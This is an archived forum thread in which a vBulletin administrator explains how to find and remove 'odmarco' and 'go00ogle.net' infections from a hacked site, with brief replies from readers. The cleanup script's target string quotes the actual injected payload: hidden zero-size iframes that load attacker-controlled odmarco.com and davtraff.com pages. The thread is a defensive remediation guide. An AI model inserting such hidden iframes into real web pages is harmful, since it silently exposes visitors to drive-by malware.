Go Back   vb.org Archive > vBulletin Article Depository > Read An Article > General Articles
Removing Odmarco and go00ogle.net infections
rockinaway
Join Date: Jun 2005
Posts: 211

 

Show Printable Version Email this Page Subscription
rockinaway rockinaway is offline 08-29-2009, 10:00 PM

Recently, as many of you know, the forum was attacked and infected with malicious code and it took me approx. 5-6 hours to remove the infections properly. The forum was infected with 2 main things: 'odmarco' and 'go00ogle.net'. Both were causing major issues and blocked many users and made the forum VERY unsafe.

Odmarco was probably the most difficult to remove, as it added malicious code to nearly every HTML file that it could access. What was worse, was that it varied the code in several files.

In this article, I aim to show you two tips on removing these infections.

Odmarco Infection

Being the most difficult, it hit me very hard that I had to search ALL HTML files manually; therefore, I looked for scripts to help me. Thankfully, I found a handy website here: Left On The Web / Cleaning "infected" file from the odmarco string

There is a great deal of explanation on that page, and more importantly, a script to help remove the strings. All the script does is search for the odmarco string and remove it from the files. I have attached the file here as well (clear_odmarco.php)

Once you know what the main string is, copy and edit the following part in the file:

Code:
protected $string_to_clear = '<iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 ma
rginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://wjzmv6.davtraff.com/tomi/?t=2" width=0 height=0 style="hidden
" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://l0dari.davtraff.com/tomi/?t=2" width=0 heig
ht=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';
Replace the iframe string with the code that is in your files.

This goes through all your files and folders to find any sign of the code. It all worked fine, until I realised that the code varies in some files. Therefore, you can manipulate the code slightly, to search for any remaining code. I have attached an edited version of the same file that can search for malicious strings (search_odmarco.php)

This file will search for the word 'odmarco' in any files, and then return 'FOUND' next to any files that contain it. You can then access these files to find the variations of the odmarco string. Then, you can either remove them manually, or change the $string_to_clear in clear_odmarco.php to help remove them for you.

Keep repeating this, until the search returns zero files to have found the word. You can repeat this for ANY other type of malicious code by simple changing the search term on line 38:

Code:
 if (strpos($contents, 'odmarco'))
Just replace odmarco with any other term. This should help you remove any traces of the infection and saves A LOT of time.

go00ogle.net Infection

This infection is much easier to remove. blog.ambor.com: How to remove a go00ogle.net infection from your WordPress blog contains a full list of steps to remove the malicious code and is considerably more straightforward.

For this infection, one (or several) of your javascript files gets infected with malicious code. You could choose to use the method for odmarco (with the files) to remove this or you can follow the steps given in the link. Since you shouldn't have that many JS files loading up, it shouldn't be too difficult for you to manually remove the code.

I hope this helps somewhat if you get infected - any questions, just ask

Originally posted @ AdminFuel

-------
Attached Files
File Type: zip odmarco files.zip (1.4 KB, 11 views)
Reply With Quote
  #2  
Old 09-07-2009, 08:28 PM
lazydesis lazydesis is offline
 
Join Date: Sep 2006
Posts: 234
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

How do you know if you got infected or not?
Reply With Quote
  #3  
Old 09-08-2009, 05:27 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

When your page is loading, you will see the URLs loading, and there will be numerous URLs with 'odmarco' in them. Also, Google would end up blocking your website and you can use Webmaster Tools to find out what you are infected with.

go00ogle.net Infections are easier to find and are described in the link.
Reply With Quote
  #4  
Old 09-18-2009, 07:31 PM
avsunforum avsunforum is offline
 
Join Date: Feb 2008
Posts: 107
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Thanks
Reply With Quote
  #5  
Old 11-12-2009, 01:02 AM
abdobasha2004's Avatar
abdobasha2004 abdobasha2004 is offline
 
Join Date: Aug 2008
Posts: 541
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

thanks a lot for sharing this
I think I am not infected however it worth making sure of it
thanks
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 03:24 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.10567 seconds
  • Memory Usage 2,246KB
  • Queries Executed 19 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (2)bbcode_code
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)modsystem_article
  • (1)navbar
  • (4)navbar_link
  • (120)option
  • (5)post_thanks_box
  • (5)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (5)post_thanks_postbit_info
  • (4)postbit
  • (1)postbit_attachment
  • (5)postbit_onlinestatus
  • (5)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_attachment
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete